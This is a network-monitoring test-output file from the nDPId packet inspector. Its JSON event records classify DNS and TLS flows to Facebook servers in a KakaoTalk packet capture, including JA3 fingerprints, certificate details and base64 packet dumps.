00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":109,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030978,"flow_last_seen":1430069030978,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1430069030978,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":19582,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"graph.facebook.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
01032{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":111,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1430069030751,"flow_last_seen":1430069031001,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1951,"flow_avg_l4_payload_len":325,"midstream":0,"thread_ts_msec":1430069031001,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45209,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.facebook.com","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"6806b8fe92d7d465715d771eb102ff04","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256"}}
01822{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":115,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1430069030751,"flow_last_seen":1430069031013,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":4134,"flow_avg_l4_payload_len":413,"midstream":0,"thread_ts_msec":1430069031013,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45209,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.facebook.com","server_names":"*.facebook.com,facebook.com,*.fbsbx.com,*.fbcdn.net,*.xx.fbcdn.net,*.xy.fbcdn.net,fb.com,*.fb.com,*.facebookcorewwwi.onion,facebookcorewwwi.onion,*.fbcdn23dssr3jqnq.onion,fbcdn23dssr3jqnq.onion,*.fbsbx2q4mvcl63pw.onion,fbsbx2q4mvcl63pw.onion,*.m.facebook.com,*.messenger.com,messenger.com,*.m.facebookcorewwwi.onion,*.xx.fbcdn23dssr3jqnq.onion,xx.fbcdn23dssr3jqnq.onion,*.xy.fbcdn23dssr3jqnq.onion,xy.fbcdn23dssr3jqnq.onion,*.xz.fbcdn.net,xz.fbcdn.net,*.xz.fbcdn23dssr3jqnq.onion,xz.fbcdn23dssr3jqnq.onion,m.facebookcorewwwi.onion","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"6806b8fe92d7d465715d771eb102ff04","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance CA-3","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.facebook.com","fingerprint":"A4:FB:65:F8:A1:57:FE:0D:C0:17:C1:B5:51:62:63:3A:18:73:A0:B4"}}
01032{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":111,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1430069030751,"flow_last_seen":1430069031001,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1951,"flow_avg_l4_payload_len":325,"midstream":0,"thread_ts_msec":1430069031001,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45209,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.facebook.com","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"6806b8fe92d7d465715d771eb102ff04","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256"}}
01822{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":115,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1430069030751,"flow_last_seen":1430069031013,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":4134,"flow_avg_l4_payload_len":413,"midstream":0,"thread_ts_msec":1430069031013,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45209,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.facebook.com","server_names":"*.facebook.com,facebook.com,*.fbsbx.com,*.fbcdn.net,*.xx.fbcdn.net,*.xy.fbcdn.net,fb.com,*.fb.com,*.facebookcorewwwi.onion,facebookcorewwwi.onion,*.fbcdn23dssr3jqnq.onion,fbcdn23dssr3jqnq.onion,*.fbsbx2q4mvcl63pw.onion,fbsbx2q4mvcl63pw.onion,*.m.facebook.com,*.messenger.com,messenger.com,*.m.facebookcorewwwi.onion,*.xx.fbcdn23dssr3jqnq.onion,xx.fbcdn23dssr3jqnq.onion,*.xy.fbcdn23dssr3jqnq.onion,xy.fbcdn23dssr3jqnq.onion,*.xz.fbcdn.net,xz.fbcdn.net,*.xz.fbcdn23dssr3jqnq.onion,xz.fbcdn23dssr3jqnq.onion,m.facebookcorewwwi.onion","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"6806b8fe92d7d465715d771eb102ff04","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance CA-3","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.facebook.com","fingerprint":"A4:FB:65:F8:A1:57:FE:0D:C0:17:C1:B5:51:62:63:3A:18:73:A0:B4"}}
00572{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":117,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1430069031017,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":138,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":138,"pkt_l4_len":102,"thread_ts_msec":1430069031017,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAHocCwAANREA2Aq8AQEKGFK8ADVMfgBmmjSqh4GAAAEAAwAAAAAFZ3JhcGgIZmFjZWJvb2sDY29tAAABAAHADAAFAAEAAAVxAAYDYXBpwBLAMAAFAAEAAAV2AAwEc3RhcgRjMTBywBLAQgABAAEAAAARAAQfDURG"}
00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":117,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069030978,"flow_last_seen":1430069031017,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":94,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1430069031017,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":19582,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"graph.facebook.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"31.13.68.70"}}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":119,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069031042,"flow_last_seen":1430069031042,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069031042,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.70","src_port":43581,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1430069031042,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069031042,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADx6qUAAPwYA7AoYUrwfDURGqj0Bu4p9cZMAAAAAoAI5CJu+AAACBAV4BAIICgALCzoAAAAAAQMDBw=="}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1430069031079,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1430069031079,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACwwtUAA+AaR7x8NREYKGFK8AbuqPWAZ05aKfXGUYBIRHOtUAAACBAV4"}
00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1430069031083,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069031083,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAACh6qkAAPwYA\/woYUrwfDURGqj0Bu4p9cZRgGdOXUBA5CNrpAAA="}
00976{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":123,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069031042,"flow_last_seen":1430069031083,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":565,"flow_tot_l4_payload_len":565,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1430069031083,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.70","src_port":43581,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"graph.facebook.com","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":119,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069031042,"flow_last_seen":1430069031042,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069031042,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.70","src_port":43581,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1430069031042,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069031042,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADx6qUAAPwYA7AoYUrwfDURGqj0Bu4p9cZMAAAAAoAI5CJu+AAACBAV4BAIICgALCzoAAAAAAQMDBw=="}
00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1430069031079,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1430069031079,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACwwtUAA+AaR7x8NREYKGFK8AbuqPWAZ05aKfXGUYBIRHOtUAAACBAV4"}
00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1430069031083,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069031083,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAACh6qkAAPwYA\/woYUrwfDURGqj0Bu4p9cZRgGdOXUBA5CNrpAAA="}
00976{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":123,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069031042,"flow_last_seen":1430069031083,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":565,"flow_tot_l4_payload_len":565,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1430069031083,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.70","src_port":43581,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"graph.facebook.com","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":127,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069031167,"flow_last_seen":1430069031167,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1430069031167,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":4017,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3}
00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":127,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1430069031167,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":85,"pkt_l4_len":49,"thread_ts_msec":1430069031167,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAEUAAEAAQBHSFwoYUrwKvAEBD7EANQAxznCJ\/wEAAAEAAAAAAAAKZGV2ZWxvcGVycwhmYWNlYm9vawNjb20AAAEAAQ=="}
00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":127,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069031167,"flow_last_seen":1430069031167,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1430069031167,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":4017,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"developers.facebook.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
01034{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":132,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1430069031042,"flow_last_seen":1430069031203,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":1845,"flow_avg_l4_payload_len":263,"midstream":0,"thread_ts_msec":1430069031203,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.70","src_port":43581,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"graph.facebook.com","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"6806b8fe92d7d465715d771eb102ff04","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256"}}
01824{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":138,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1430069031042,"flow_last_seen":1430069031220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":4136,"flow_avg_l4_payload_len":344,"midstream":0,"thread_ts_msec":1430069031220,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.70","src_port":43581,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"graph.facebook.com","server_names":"*.facebook.com,facebook.com,*.fbsbx.com,*.fbcdn.net,*.xx.fbcdn.net,*.xy.fbcdn.net,fb.com,*.fb.com,*.facebookcorewwwi.onion,facebookcorewwwi.onion,*.fbcdn23dssr3jqnq.onion,fbcdn23dssr3jqnq.onion,*.fbsbx2q4mvcl63pw.onion,fbsbx2q4mvcl63pw.onion,*.m.facebook.com,*.messenger.com,messenger.com,*.m.facebookcorewwwi.onion,*.xx.fbcdn23dssr3jqnq.onion,xx.fbcdn23dssr3jqnq.onion,*.xy.fbcdn23dssr3jqnq.onion,xy.fbcdn23dssr3jqnq.onion,*.xz.fbcdn.net,xz.fbcdn.net,*.xz.fbcdn23dssr3jqnq.onion,xz.fbcdn23dssr3jqnq.onion,m.facebookcorewwwi.onion","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"6806b8fe92d7d465715d771eb102ff04","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance CA-3","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.facebook.com","fingerprint":"A4:FB:65:F8:A1:57:FE:0D:C0:17:C1:B5:51:62:63:3A:18:73:A0:B4"}}
01034{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":132,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1430069031042,"flow_last_seen":1430069031203,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":1845,"flow_avg_l4_payload_len":263,"midstream":0,"thread_ts_msec":1430069031203,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.70","src_port":43581,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"graph.facebook.com","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"6806b8fe92d7d465715d771eb102ff04","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256"}}
01824{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":138,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1430069031042,"flow_last_seen":1430069031220,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":4136,"flow_avg_l4_payload_len":344,"midstream":0,"thread_ts_msec":1430069031220,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.70","src_port":43581,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"graph.facebook.com","server_names":"*.facebook.com,facebook.com,*.fbsbx.com,*.fbcdn.net,*.xx.fbcdn.net,*.xy.fbcdn.net,fb.com,*.fb.com,*.facebookcorewwwi.onion,facebookcorewwwi.onion,*.fbcdn23dssr3jqnq.onion,fbcdn23dssr3jqnq.onion,*.fbsbx2q4mvcl63pw.onion,fbsbx2q4mvcl63pw.onion,*.m.facebook.com,*.messenger.com,messenger.com,*.m.facebookcorewwwi.onion,*.xx.fbcdn23dssr3jqnq.onion,xx.fbcdn23dssr3jqnq.onion,*.xy.fbcdn23dssr3jqnq.onion,xy.fbcdn23dssr3jqnq.onion,*.xz.fbcdn.net,xz.fbcdn.net,*.xz.fbcdn23dssr3jqnq.onion,xz.fbcdn23dssr3jqnq.onion,m.facebookcorewwwi.onion","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"6806b8fe92d7d465715d771eb102ff04","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance CA-3","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.facebook.com","fingerprint":"A4:FB:65:F8:A1:57:FE:0D:C0:17:C1:B5:51:62:63:3A:18:73:A0:B4"}}
00581{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":139,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1430069031221,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":144,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":144,"pkt_l4_len":108,"thread_ts_msec":1430069031221,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAIDtrgAANREvLgq8AQEKGFK8ADUPsQBsjjKJ\/4GAAAEAAwAAAAAKZGV2ZWxvcGVycwhmYWNlYm9vawNjb20AAAEAAcAMAAUAAQAAA+oABwRzdGFywBfANQAFAAEAAAPqAAwEc3RhcgRjMTBywBfASAABAAEAAAAIAAQfDURU"}
00802{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":139,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069031167,"flow_last_seen":1430069031221,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1430069031221,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":4017,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"developers.facebook.com","num_queries":1,"num_answers":3,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"31.13.68.84"}}
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":144,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069031230,"flow_last_seen":1430069031230,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1430069031230,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":14650,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3}
00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":144,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1430069031230,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":87,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":87,"pkt_l4_len":51,"thread_ts_msec":1430069031230,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAEcAAEAAQBHSFQoYUrwKvAEBOToANQAzWvOyogEAAAEAAAAAAAABMgI5NwMyNTIDMTczB2luLWFkZHIEYXJwYQAADAAB"}
00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":144,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069031230,"flow_last_seen":1430069031230,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1430069031230,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":14650,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"2.97.252.173.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":146,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069031236,"flow_last_seen":1430069031236,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069031236,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45211,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
